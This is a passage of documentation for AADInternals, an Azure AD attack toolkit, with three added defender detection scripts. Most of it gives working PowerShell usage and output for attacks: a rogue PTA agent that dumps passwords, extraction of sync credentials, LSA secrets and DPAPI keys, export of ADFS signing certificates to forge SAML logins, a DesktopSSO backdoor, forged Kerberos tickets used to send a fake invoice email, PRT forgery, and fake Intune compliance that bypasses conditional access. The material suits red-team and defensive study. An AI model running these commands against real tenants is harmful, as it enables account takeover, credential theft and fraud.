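    $regPath = 'HKLM:\SOFTWARE\Microsoft\Azure AD Connect Agents\Azure AD Connect Authentication Agent'
    $reg = Get-ItemProperty -Path $regPath -ErrorAction SilentlyContinue
    if (-not $reg) {
        $findings.Add("registry key not found: $regPath")
    } elseif ($reg.TenantID -ne $ExpectedTenantId) {
        $findings.Add("TenantID is '$($reg.TenantID)', expected '$ExpectedTenantId'")
    }

    # 4. Certificate referenced by TrustSettings.xml must exist in LocalMachine\My with a private key.
    $trustFile = Join-Path $env:ProgramData 'Microsoft\Azure AD Connect Authentication Agent\Config\TrustSettings.xml'
    $certificates = @()
    if (Test-Path -LiteralPath $trustFile) {
        $text = Get-Content -LiteralPath $trustFile -Raw
        $thumbprints = [regex]::Matches($text, '\b[0-9A-Fa-f]{40}\b') |
            ForEach-Object { $_.Value.ToUpperInvariant() } | Select-Object -Unique
        foreach ($tp in $thumbprints) {
            $cert = Get-ChildItem -Path Cert:\LocalMachine\My |
                Where-Object { $_.Thumbprint -eq $tp } | Select-Object -First 1
            if (-not $cert) {
                $findings.Add("TrustSettings.xml references $tp, which is not in Cert:\LocalMachine\My")
                continue
            }
            if (-not $cert.HasPrivateKey) { $findings.Add("agent certificate $tp has no private key") }
            $certificates += [pscustomobject]@{
                Thumbprint = $tp
                Subject    = $cert.Subject
                NotAfter   = $cert.NotAfter
            }
        }
    } else {
        $findings.Add("TrustSettings.xml not found at $trustFile")
    }

    [pscustomobject]@{
        ComputerName     = $env:COMPUTERNAME
        InstanceID       = $reg.InstanceID
        TenantID         = $reg.TenantID
        AgentCertificate = $certificates
        Findings         = $findings.ToArray()
    }
}

# Usage: replace the placeholder with the tenant ID the agent should serve.
Test-PtaAgentHost -ExpectedTenantId '<expected-tenant-id>' | Format-List
```

The InstanceID and certificate thumbprint reported here should be compared with what the tenant itself believes is registered (Get-AADIntProxyAgents above lists the agent IDs and machine names Azure AD knows about), since Set-AADIntPTACertificate can repoint an agent at a different tenant while leaving the service running normally.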

Invoke-AADIntPTAAgent (*)

Since version 0.2.8
Invokes the PTA Agent with the given name and certificate, and connects to Azure AD. Emulates the Azure AD Authentication Agent by accepting any password and dumping the passwords to the console.

Note! This is AN EXPERIMENTAL version likely to crash! The PowerShell implementation was too slow, so this had to be coded in C#.

Example 1:

# Invoke the PTA Agent
Invoke-AADIntPTAAgent -MachineName "server1.company.com" -FileName server1.pfx

Output:

Connector 1 connecting to his-eur1-neur1
Connector 2 connecting to his-eur1-neur1
Connector 3 connecting to his-eur1-weur1
Connector 4 connecting to his-eur1-weur1

PTAAgent started, waiting for logins..

Example 2:

# Register a PTA agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -AccessToken $pt -MachineName "server1.company.com"

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx
# Invoke the PTA Agent
Invoke-AADIntPTAAgent -MachineName "server1.company.com"

Output:

Connector 1 connecting to his-eur1-neur1
Connector 2 connecting to his-eur1-neur1
Connector 3 connecting to his-eur1-weur1
Connector 4 connecting to his-eur1-weur1

PTAAgent started, waiting for logins..

Get-AADIntProxyAgents (P)

Since version 0.2.9
This function shows the list of MS App Proxy authentication (PTA) and provisioning (Azure AD Connect cloud provisioning) agents.

Example:

# Get the access token
$pt=Get-AADIntAccessTokenForPTA

# List the proxy agents
Get-AADIntProxyAgents -AccessToken $pt | ft

Output:

id                                   machineName         externalIp     status   supportedPublishingTypes
--                                   -----------         ----------     ------   ------------------------
51f3afd9-685b-413a-aafa-bab0d556ea4b this.is.a.fake      67.35.155.73   active   {authentication}        
51a061a0-968d-48b8-951e-5ae9d9a0441f server1.company.com 93.188.31.116  inactive {authentication}        
49c9ad46-c067-42f6-a678-dfd938c27789 server2.company.com 102.20.104.213 inactive {provisioning} 

Get-AADIntProxyAgentGroups (P)

Since version 0.2.9
This function shows the list of MS App Proxy agent groups for authentication (PTA) and provisioning (Azure AD Connect cloud provisioning) agents.

Example:

# Get the access token
$pt=Get-AADIntAccessTokenForPTA

# List the proxy agent groups
Get-AADIntProxyAgentGroups -AccessToken $pt | ft

Output:

TenantId                    : ea664074-37dd-4797-a676-b0cf6fdafcd4
ConfigurationDisplayName    : company.com
ConfigurationResourceName   : company.com
ConfigurationPublishingType : provisioning
id                          : 4b6ffe82-bfe2-4357-814c-09da95399da7
displayName                 : Group-company.com-42660f4a-9e66-4a08-ac17-2a2e0d8b993e
publishingType              : provisioning
isDefault                   : False

Hack functions: Directory Synchronization

Set-AADIntPasswordHashSyncEnabled (A)

Since version 0.1.6
This function enables or disables password hash synchronization (PHS).

This can be used to turn on PHS so that passwords can be set using Set-AADIntUserPassword.

Example:

# Enable PHS
Set-AADIntPasswordHashSyncEnabled -Enable $true

New-AADIntGuestInvitation (Z)

This function invites a guest user to the tenant. Does not require admin rights, as long as access to the Azure Portal is allowed. Basically, this function allows every member of the tenant to invite guest users to the tenant.

Example:

# Get the auth token. Supports also external users (outlook.com, etc.)
$zt=Get-AADIntAuthTokenForAADIAMAPI -Credentials (Get-Credential)
# Invite the guest user
New-AADIntGuestInvitation -AuthToken $zt -EmailAddress someone@outlook.com -Message "Welcome to our tenant!"

Output:

accountEnabled                        : True
usageLocation                         : 
mailNickname                          : someone_outlook.com#EXT#
passwordProfile                       : 
rolesEntity                           : 
selectedGroupIds                      : 
streetAddress                         : 
city                                  : 
state                                 : 
country                               : 
telephoneNumber                       : 
mobile                                : 
physicalDeliveryOfficeName            : 
postalCode                            : 
authenticationPhoneNumber             : 
authenticationAlternativePhoneNumber  : 
authenticationEmail                   : 
strongAuthenticationDetail            : @{verificationDetail=}
defaultImageUrl                       : 
ageGroup                              : 
consentProvidedForMinor               : 
legalAgeGroupClassification           : 
objectId                              : e250c8f5-3ff3-4eea-9d68-cff019fa850e
objectType                            : User
displayName                           : someone
userPrincipalName                     : someone_outlook.com#EXT#@company.onmicrosoft.com
thumbnailPhoto@odata.mediaContentType : 
givenName                             : 
surname                               : 
mail                                  : someone@outlook.com
dirSyncEnabled                        : 
alternativeSecurityIds                : {}
signInNamesInfo                       : {}
signInNames                           : {someone_outlook.com#EXT#@company.onmicrosoft.com}
ownedDevices                          : 
jobTitle                              : 
department                            : 
displayUserPrincipalName              : 
hasThumbnail                          : False
imageUrl                              : 
imageDataToUpload                     : 
source                                : 
sources                               : 
sourceText                            : 
userFlags                             : 
deletionTimestamp                     : 
permanentDeletionTime                 : 
alternateEmailAddress                 : 
manager                               : 
userType                              : Guest
isThumbnailUpdated                    : 
isAuthenticationContactInfoUpdated    : 
searchableDeviceKey                   : {}
displayEmail                          : 
creationType                          : Invitation
userState                             : PendingAcceptance
otherMails                            : {someone@outlook.com}

Get-AADIntSyncCredentials (*)

Since version 0.1.8
This function extracts the Azure AD Connect credentials for AD and Azure AD from the WID database. Note: This function “elevates” the session to the ADSync user. You MUST restart PowerShell to restore the original rights.

Example:

# Get Azure AD Connect credentials
Get-AADIntSyncCredentials

Output:

Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                   
AADUserPassword                $.1%(lxZ&/kNZz[r

Update-AADIntSyncCredentials (*)

Since version 0.1.8
This function resets the Azure AD Connect credentials for Azure AD and stores them in the Azure AD Connect configuration database. Note: This function “elevates” the session to the ADSync user. You MUST restart PowerShell to restore the original rights.

Example:

# Get the current Azure AD Connect credentials
Get-AADIntSyncCredentials
# Save credentials to a variable
$Cred = Get-Credential -Message "O365" -UserName "Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com"

# Get Access Token
$Token=Get-AADIntAccessTokenForAADGraph -Credentials $Cred

# Update Azure AD Connect credentials for Azure AD
Update-AADIntSyncCredentials -AccessToken $Token

Output:

Password successfully updated to Azure AD and configuration database!

Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                   
AADUserPassword                Y%C(]u%Rq;en-P;^

Remember to restart the sync service: Restart-Service ADSync

Get-AADIntSyncEncryptionKeyInfo (*)

Since version 0.3.0
This function extracts Entropy and InstanceID from the local ADSync configuration database. Returned information can be used with Get-AADIntSyncEncryptionKey.

Example:

# Get the ADSync encryption key info
Get-AADIntSyncEncryptionKeyInfo

Output:

Name                           Value                                                                                                                                            
----                           -----                                                                                                                                            
InstanceId                     299b1d83-9dc6-479a-92f1-2357fc5abfed                                                                                                             
Entropy                        a1c80460-6fe9-4c6f-bf31-d7a34c878dca

Get-AADIntSyncEncryptionKey (*)

Since version 0.3.0
Gets the ADSync encryption key using the given entropy and instance ID. These can be read from the database or obtained with Get-AADIntSyncEncryptionKeyInfo.

Example:

# Get the key information
$key_info = Get-AADIntSyncEncryptionKeyInfo

# Get the ADSync encryption key 
Get-AADIntSyncEncryptionKey -Entropy $key_info.Entropy -InstanceId $key_info.InstanceId

Output:

Id     Guid                                 CryptAlg Key                   
--     ----                                 -------- ---                   
100000 299b1d83-9dc6-479a-92f1-2357fc5abfed    26128 {4, 220, 54, 13...}

Hack functions: ADFS

New-AADIntADFSSelfSignedCertificates (*)

Since version 0.2.3
Disables certificate auto rollover and creates new self-signed Token Signing and Token Decrypt certificates for the ADFS service. The created certificates are copies of the existing certificates, except that they are valid for 10 years. The certificates are added to ADFS and the service is restarted. The certificates are also exported to the current directory.

Default password for exported .pfx files is “AADInternals”

Note! If there are multiple ADFS servers, the certificates MUST be imported to each server’s Local Machine Personal store and the ADFS service account must be granted read access to their private keys. Also, the ADFS service needs to be restarted on each server.

Don’t forget to update the certificate information in Azure AD using Update-AADIntADFSFederationSettings

Example:

# Create new certificates
New-AADIntADFSSelfSignedCertificates

Restore-AADIntADFSAutoRollover (*)

Since version 0.2.3
Restores ADFS to “normal” mode: Token Signing and Token Decryption certificates are automatically rolled over once a year. Enables certificate auto rollover, updates Token Signing and Token Decryption certificates and removes the old self-signed certificates.

Note! If there are multiple ADFS servers the ADFS service needs to be restarted on each server.

Don’t forget to update the certificate information in Azure AD using Update-AADIntADFSFederationSettings

Example:

# Restore the auto rollover mode
Restore-AADIntADFSAutoRollover
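A defender-side check for the state the two functions above change, added here as an example (it is not part of AADInternals). It runs on an ADFS server with the ADFS module loaded, reports whether auto rollover is off, and lists token certificates whose lifetime exceeds the configured CertificateDuration by more than an assumed tolerance, which is exactly how a 10-year copy stands out.

```powershell
# Added example, not part of AADInternals. Run on an ADFS server where the ADFS
# module (Get-AdfsProperties, Get-AdfsCertificate) is available.
function Test-AdfsTokenCertificateHygiene {
    [CmdletBinding()]
    param(
        # Margin added to the configured CertificateDuration (365 days by default)
        # before a certificate's lifetime is reported; assumed value.
        [int]$ToleranceDays = 30
    )

    $findings = New-Object System.Collections.Generic.List[object]
    $props    = Get-AdfsProperties

    # New-AADIntADFSSelfSignedCertificates leaves this switched off.
    if (-not $props.AutoCertificateRollover) {
        $findings.Add([pscustomobject]@{
            Check   = 'AutoCertificateRollover'
            Type    = 'Property'
            Subject = ''
            Detail  = 'Disabled: token certificates are not renewed automatically'
        })
    }
    $maxLifetime = $props.CertificateDuration + $ToleranceDays

    foreach ($type in 'Token-Signing', 'Token-Decrypting') {
        $entries = @(Get-AdfsCertificate -CertificateType $type)

        # Normal state: one primary certificate, two during a rollover window.
        if ($entries.Count -gt 2) {
            $findings.Add([pscustomobject]@{
                Check   = 'CertificateCount'
                Type    = $type
                Subject = ''
                Detail  = "$($entries.Count) certificates configured"
            })
        }

        foreach ($entry in $entries) {
            $cert     = $entry.Certificate
            $lifetime = [math]::Round(($cert.NotAfter - $cert.NotBefore).TotalDays)
            # A ten-year copy of the original certificate is reported here.
            if ($lifetime -gt $maxLifetime) {
                $findings.Add([pscustomobject]@{
                    Check   = 'Lifetime'
                    Type    = $type
                    Subject = $cert.Subject
                    Detail  = "Valid for $lifetime days (primary: $($entry.IsPrimary), thumbprint $($cert.Thumbprint))"
                })
            }
        }
    }
    return $findings
}

# Usage: any rows returned are worth a closer look.
Test-AdfsTokenCertificateHygiene | Format-Table -AutoSize
```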

Update-AADIntADFSFederationSettings (A)

Since version 0.2.3
Updates federation information of the given domain to match the local ADFS server information.

Example:

# Update federation setting for domain company.com
Update-AADIntADFSFederationSettings -Domain company.com

Export-AADIntADFSSigningCertificate (*)

Since version 0.2.5
This function exports the ADFS token signing certificate. Must be run on an ADFS server as a domain admin or as the ADFS service account.

The certificate can be used to create valid SAML tokens to log in as any user of the tenant.

Example:

# Export ADFS token signing certificate
Export-AADIntADFSSigningCertificate -filename ADFSSigningCertificate.pfx

Export-AADIntADFSEncryptionCertificate (*)

Since version 0.2.5
This function exports the ADFS token encryption certificate. Must be run on an ADFS server as a domain admin or as the ADFS service account.

The certificate can be used to encrypt SAML tokens.

Example:

# Export ADFS token encryption certificate
Export-AADIntADFSEncryptionCertificate -filename ADFSEncryptionCertificate.pfx

Hack functions: Seamless Single-sign-on (DesktopSSO)

Get-AADIntDesktopSSO (P)

Since version 0.2.6
Shows the Desktop SSO (a.k.a. Seamless SSO) status of the tenant.

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt

Output:

Domains      : 
Enabled      : False
ErrorMessage : 
Exists       : True
IsSuccessful : True

Set-AADIntDesktopSSOEnabled (P)

Since version 0.2.6
Enables or disables DesktopSSO.

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Enable the DesktopSSO
Set-AADIntDesktopSSOEnabled -AccessToken $pt -Enable $true

Output:

IsSuccessful ErrorMessage
------------ ------------
        True

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt
Output:

Domains      : 
Enabled      : True
ErrorMessage : 
Exists       : True
IsSuccessful : True

Set-AADIntDesktopSSO (P)

Since version 0.2.6
Sets DesktopSSO information for the given domain. In other words, you can create a backdoor! It can also be used to change the password of the existing DesktopSSO configuration in Azure AD and to reset the password of the computer account used for SSO (default is AZUREADSSOACC).

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Enable the DesktopSSO for the given domain
Set-AADIntDesktopSSO -AccessToken $pt -DomainName company.com -Password "mypassword" -Enable $true

Output:

IsSuccessful ErrorMessage
------------ ------------
        True

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt
Output:

Domains      : company.com
Enabled      : True
ErrorMessage : 
Exists       : True
IsSuccessful : True

New-AADIntKerberosTicket

Since version 0.2.6
This function creates a Kerberos ticket from the given user details and the server (usually AZUREADSSOACC) password. Only the user’s SID and the server password are used.

The user SID can be given as a SID object, a SID string, or a UserPrincipalName (UPN). If a UPN is given, the SID is looked up from AD or AAD. For AD, the user running the command needs read access to AD. For AAD, an access token for Azure AD Graph needs to be given.

Note! The Kerberos ticket is valid only for a couple of minutes!

Example:

# Create a Kerberos ticket
$kt=New-AADIntKerberosTicket -ADUserPrincipalName user@company.com -Password "mypassword"

# Get an access token for Exchange Online
$et=Get-AADIntAccessTokenForEXO -KerberosTicket $kt -Domain company.com

# Send an email using Outlook API
Send-AADIntOutlookMessage -AccessToken $et -Recipient "accounting@company.com" -Subject "Invoice" -Message "Pay the attached invoice <b>ASAP!</b>"
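Since the Seamless SSO computer account’s password is the only secret the ticket above depends on, a defender wants to know its age and whether it was reset outside the planned rollover. The following check is an added example (not part of AADInternals); it assumes the ActiveDirectory module, the default account name AZUREADSSOACC, a 30-day rotation interval, and that the account’s only SPN is for the autologon.microsoftazuread-sso.com endpoint.

```powershell
# Added example, not part of AADInternals. Needs the ActiveDirectory module and
# read access to the computer object; the SPN pattern below is an assumption.
function Test-SeamlessSsoAccount {
    [CmdletBinding()]
    param(
        [string]$AccountName = 'AZUREADSSOACC',   # default name, as noted above
        [int]$MaxPasswordAgeDays = 30             # assumed rotation interval
    )

    $acct = Get-ADComputer -Filter "Name -eq '$AccountName'" `
                           -Properties PasswordLastSet, ServicePrincipalNames, Description
    if (-not $acct) {
        return [pscustomobject]@{ Account = $AccountName; Found = $false }
    }

    $ageDays = $null
    if ($acct.PasswordLastSet) {
        $ageDays = [math]::Round(((Get-Date) - $acct.PasswordLastSet).TotalDays)
    }

    # The only SPN expected here is the SSO endpoint's; anything else is unexpected.
    $spns      = @($acct.ServicePrincipalNames)
    $ssoSpns   = @($spns | Where-Object { $_ -like '*autologon.microsoftazuread-sso.com*' })
    $otherSpns = @($spns | Where-Object { $_ -notlike '*autologon.microsoftazuread-sso.com*' })

    [pscustomobject]@{
        Account         = $acct.Name
        Found           = $true
        Enabled         = $acct.Enabled
        PasswordLastSet = $acct.PasswordLastSet
        PasswordAgeDays = $ageDays
        # Stale: the password (Kerberos decryption key) has not been rolled in time.
        Stale           = ($null -eq $ageDays) -or ($ageDays -gt $MaxPasswordAgeDays)
        # ResetRecently: correlate with your own key-rollover change record; a
        # reset you did not plan is what Set-AADIntDesktopSSO (above) performs.
        ResetRecently   = ($null -ne $ageDays) -and ($ageDays -le 1)
        HasSsoSpn       = $ssoSpns.Count -gt 0
        UnexpectedSpns  = ($otherSpns -join '; ')
    }
}

Test-SeamlessSsoAccount | Format-List
```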

Hack functions: Active Directory

Get-AADIntDPAPIKeys (*)

Since version 0.3.0
Gets DPAPI system keys which can be used to decrypt secrets of all users encrypted with DPAPI. MUST be run on a domain controller as an administrator.

Example:

# Get DPAPI keys
Get-AADIntDPAPIKeys

Output:

UserKey               UserKeyHex                               MachineKey            MachineKeyHex                           
-------               ----------                               ----------            -------------                           
{16, 130, 39, 122...} 1082277ac85a532018930b782c30b7f2f91f7677 {226, 88, 102, 95...} e258665f0a016a7c215ceaf29ee1ae17b9f017b9

Get-AADIntLSASecrets (*)

Since version 0.3.0
Gets computer’s Local Security Authority (LSA) secrets. MUST be run as an administrator.

Example:

# Get LSA secrets
Get-AADIntLSASecrets

Output:

Name        : $MACHINE.ACC
Password    : {1, 2, 3, 4...}
PasswordHex : 01020304..
PasswordTxt : 컓噖덭а劈-⌋결
MD4         : {1, 2, 3, 4...}
SHA1        : {1, 2, 3, 4...}
MD4Txt      : aabbccdd..
SHA1Txt     : aabbccdd..

Name        : DPAPI_SYSTEM
Password    : {1, 0, 0, 0...}
PasswordHex : 0100000001082277ac85a532018930b782c30b7f2f91f7677e258665f0a016a7c215ceaf29ee1ae17b9f017b9
PasswordTxt : 결挌榵
MD4         : {1, 2, 3, 4...}
SHA1        : {1, 2, 3, 4...}
MD4Txt      : aabbccdd..
SHA1Txt     : aabbccdd..

Name        : NL$KM
Password    : {1, 2, 3, 4...}
PasswordHex : 01020304..
PasswordTxt : ⬡ꎛ
MD4         : {1, 2, 3, 4...}
SHA1        : {1, 2, 3, 4...}
MD4Txt      : aabbccdd..
SHA1Txt     : aabbccdd..

Name        : _SC_ADSync
Password    : {1, 2, 3, 4...}
PasswordHex : 01020304..
PasswordTxt : a5bTiGcvC8fr=E;MQ331IOt/&RP,!m:qjiRXaS;xr4V#6t74;&7mXWoOoz"57K/kKTz#xdBBqb.GDKly
MD4         : {1, 2, 3, 4...}
SHA1        : {1, 2, 3, 4...}
MD4Txt      : aabbccdd..
SHA1Txt     : aabbccdd..

Get-AADIntLSABackupKeys (*)

Since version 0.3.0
Gets Local Security Authority (LSA) backup keys which can be used to decrypt secrets of all users encrypted with DPAPI. MUST be run as an administrator.

Example:

# Get LSA backup keys
Get-AADIntLSABackupKeys

Output:

certificate     Name   Id                                   Key                   
-----------     ----   --                                   ---                   
{1, 2, 3, 4...} RSA    e783c740-2284-4bd6-a121-7cc0d39a5077 {231, 131, 199, 64...}
                Legacy ff127a05-51b1-4d45-8655-30c883631d90 {255, 18, 122, 5...}

Get-AADIntSystemMasterKeys (*)

Since version 0.3.0
Gets local system master keys with the given system backup key (LSA backup key).

Example:

# Get the LSA backup keys
$lsabk_keys=Get-AADIntLSABackupKeys

# Save the private key to a variable
$rsa_key=$lsabk_keys | where name -eq RSA

# Get system master keys
Get-AADIntSystemMasterkeys -SystemKey $rsa_key.key

Output:

Name                           Value
----                           -----
ec3c7e8e-fb06-43ad-b382-8c5... {236, 60, 126, 142...}

Get-AADIntUserMasterKeys (*)

Since version 0.3.0
Gets user’s master keys using the password or system backup key (LSA backup key).

Example:

# Get user's master keys with username and password
Get-AADIntUserMasterkeys -UserName "myuser" -SID "S-1-5-xxxx" -Password "password"

Output:

Name                           Value
----                           -----
ec3c7e8e-fb06-43ad-b382-8c5... {236, 60, 126, 142...}
8a26d304-198c-4495-918f-77b... {166, 95, 5, 216...}

Example:

# Get user's master keys using LSA backup key
# Get the LSA backup keys
$lsabk_keys=Get-AADIntLSABackupKeys

# Save the private key to a variable
$rsa_key=$lsabk_keys | where name -eq RSA

# Get user's master keys
Get-AADIntUserMasterkeys -UserName "myuser" -SID "S-1-5-xxxx" -SystemKey $rsa_key.key

Output:

Name                           Value
----                           -----
ec3c7e8e-fb06-43ad-b382-8c5... {236, 60, 126, 142...}
8a26d304-198c-4495-918f-77b...

Get-AADIntLocalUserCredentials (*)

Since version 0.3.0
Gets user’s credentials from the local credential vault. Note: Currently supports only SHA1 hashing and 3DES encryption algorithms, so probably fails for “normal” users.

Example:

# Get the LSA backup keys
$lsabk_keys=Get-AADIntLSABackupKeys

# Save the private key to a variable
$rsa_key=$lsabk_keys | where name -eq RSA

# Get user's master keys
$user_masterkeys=Get-AADIntUserMasterkeys -UserName "myuser" -SID "S-1-5-xxxx" -SystemKey $rsa_key.key

# List user's credentials
Get-AADIntLocalUserCredentials -UserName "myuser" -MasterKeys $user_masterkeys

Output:

Target        : LegacyGeneric:target=msTeams_autologon.microsoftazuread-sso.com:443/user@company.com
Persistance   : local_machine
Edited        : 26/03/2020 10.12.11
Alias         : 
Comment       : 
UserName      : 
Secret        : {97, 115, 100, 102...}
SecretTxt     : 獡晤晤
SecretTxtUtf8 : asdfdf
Attributes    : {}

Hack functions: Azure AD join, MDM & PRT

Get-AADIntUserPRTToken (*)

Since version 0.4.1
Gets user’s PRT token from the Azure AD joined or Hybrid joined computer. Uses BrowserCore.exe to get the PRT token.

Example:

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Join-AADIntDeviceToAzureAD (J)

Since version 0.4.1
Emulates Azure AD Join by registering the given device to Azure AD and generating a corresponding certificate.

You may use any name, type or OS version you like.

The generated certificate can be used to create a Primary Refresh Token and P2P certificates. The certificate has no password.

Example:

# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache

# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "My computer" -DeviceType "Commodore" -OSVersion "C64"
Output:

Device successfully registered to Azure AD:
  DisplayName:     "My computer"
  DeviceId:        d03994c9-24f8-41ba-a156-1805998d6dc7
  Cert thumbprint: 78CC77315A100089CF794EE49670552485DE3689
  Cert file name : "d03994c9-24f8-41ba-a156-1805998d6dc7.pfx"
Local SID:
  S-1-5-32-544
Additional SIDs:
  S-1-12-1-797902961-1250002609-2090226073-616445738
  S-1-12-1-3408697635-1121971140-3092833713-2344201430
  S-1-12-1-2007802275-1256657308-2098244751-2635987013

Get-AADIntUserPRTKeys (*)

Since version 0.4.1
Creates a new set of Primary Refresh Token (PRT) keys for the user, including a session key and a refresh_token (PRT). Keys are saved to a json file.

Example:

# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache

# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "My computer" -DeviceType "Commodore" -OSVersion "C64"

Device successfully registered to Azure AD:
  DisplayName:     "My computer"
  DeviceId:        d03994c9-24f8-41ba-a156-1805998d6dc7
  Cert thumbprint: 78CC77315A100089CF794EE49670552485DE3689
  Cert file name : "d03994c9-24f8-41ba-a156-1805998d6dc7.pfx"
Local SID:
  S-1-5-32-544
Additional SIDs:
  S-1-12-1-797902961-1250002609-2090226073-616445738
  S-1-12-1-3408697635-1121971140-3092833713-2344201430
  S-1-12-1-2007802275-1256657308-2098244751-2635987013

# Get user's credentials
$creds = Get-Credential

# Get new PRT and key
$prtKeys = Get-AADIntUserPRTKeys -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -Credentials $creds

New-AADIntUserPRTToken (*)

Since version 0.4.1
Creates a new Primary Refresh Token (PRT) as a JWT that can be used to sign in as the user.

Example (continuing the previous example):

# Generate a new PRT token
$prtToken = New-AADIntUserPRTToken -Settings $prtKeys -GetNonce

# Get the access token using the PRT token
$at = Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

New-AADIntP2PDeviceCertificate (*)

Since version 0.4.1
Creates a new peer-to-peer (P2P) device or user certificate and exports it and the corresponding CA certificate. It can be used to enable RDP trust between devices of the same AAD tenant.

Example 1:

# Generate a new device P2P certificate using the device certificate
New-AADIntP2PDeviceCertificate -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -TenantId 4169fee0-df47-4e31-b1d7-5d248222b872 -DeviceName "mypc1.company.com"
Output:

Device certificate successfully created:
  Subject:         "CN=d03994c9-24f8-41ba-a156-1805998d6dc7, DC=4169fee0-df47-4e31-b1d7-5d248222b872"
  DnsName:         "mydevice.contoso.com"
  Issuer:          "CN=MS-Organization-P2P-Access [2020]"
  Cert thumbprint: 84D7641F9BFA90767EA3456E443E21948FC425E5
  Cert file name : "d03994c9-24f8-41ba-a156-1805998d6dc7-P2P.pfx"
  CA file name :   "d03994c9-24f8-41ba-a156-1805998d6dc7-P2P-CA.der"

Example 2:

# Generate a new user P2P certificate using the PRT and session key
New-AADIntP2PDeviceCertificate -Settings $prtKeys
Output:

User certificate successfully created:
  Subject:         "CN=TestU@contoso.com, CN=S-1-12-1-xx-xx-xx-xx, DC=0f73eaa6-7fd6-48b8-8897-e382ba96daf4"
  Issuer:          "CN=MS-Organization-P2P-Access [2020]"
  Cert thumbprint: A7F1D1F134569E0234E6AA722354D99C3AA68D0F
  Cert file name : "TestU@contoso.com-P2P.pfx"
  CA file name :   "TestU@contoso.com-P2P-CA.der"

Join-AADIntDeviceToIntuneMDM (M)

Since version 0.4.1
Enrolls the given device to Intune MDM and generates a corresponding certificate.

After enrollment, the device is in compliant state, which allows bypassing conditional access (CA) restrictions based on the compliance.

The certificate has no password.

Example:

# Get access token with device id claim
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache

# Enroll the device to Intune
Join-AADIntDeviceToIntuneMDM -DeviceName "My computer"
Output:

Intune client certificate successfully created:
  Subject:         "CN=5ede6e7a-7b77-41bd-bfe0-ef29ca70a3fb"
  Issuer:          "CN=Microsoft Intune MDM Device CA"
  Cert thumbprint: A1D407FF66EF05D153B67129B8541058A1C395B1
  Cert file name:  "d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx"
  CA file name :   "d03994c9-24f8-41ba-a156-1805998d6dc7-MDM-CA.der"
  IntMedCA file :  "d03994c9-24f8-41ba-a156-1805998d6dc7-MDM-INTMED-CA.der"

Start-AADIntDeviceDMSync (*)

Since version 0.4.2
Starts a device callback to Intune. Resets also the name of the device to given device name.

Example:

# Start the device callback to Intune
Start-AADIntDeviceDMSync -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx

Get-AADIntDeviceRegAuthMethods (A)

Since version 0.4.3
Gets the authentication methods used while registering the device.

For instance, if MFA was used while registering the device, the PRT also has the mfa claim present.

Example:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Get the authentication methods
Get-AADIntDeviceRegAuthMethods -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7"
Output:

pwd

Set-AADIntDeviceRegAuthMethods (A)

Since version 0.4.3
Sets the authentication methods used while registering the device.

Example:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Set the authentication methods
Set-AADIntDeviceRegAuthMethods -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -Methods pwd,rsa,mfa
Output:

pwd
rsa
mfa

Get-AADIntDeviceTransportKey (A)

Since version 0.4.3
Gets the public key of the device’s transport key, created during registration/join.

Example:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Export the transport key 
Get-AADIntDeviceTransportKey -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" 
Output:

Device TKPUB key successfully exported:
  Device ID:             d03994c9-24f8-41ba-a156-1805998d6dc7
  Cert thumbprint:       4b56e1f1b80024359e34010d9aab3ced9c67ff5e
  Cert SHA256:           VD3rdP4R2KMzhp/TdqnoFTg6FaO5R0dE7LoC/H155M=
  Public key file name : "d03994c9-24f8-41ba-a156-1805998d6dc7-TKPUB.json"

Set-AADIntDeviceTransportKey (A)

Since version 0.4.3
Sets the public key of the device’s transport key, created during registration/join.

Example 1:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Change the transport key to the internal any.sts
Set-AADIntDeviceTransportKey -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -UseBuiltInCertificate

Example 2:

# Change the transport key exported earlier
Set-AADIntDeviceTransportKey -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -JsonFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-TKPUB.json

Example 3:

# Change the transport key using pfx
Set-AADIntDeviceTransportKey -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -PfxFileName .\my_cert.pfx -PfxPassword "MyPassword"

Get-AADIntDeviceCompliance (A)

Since version 0.4.3
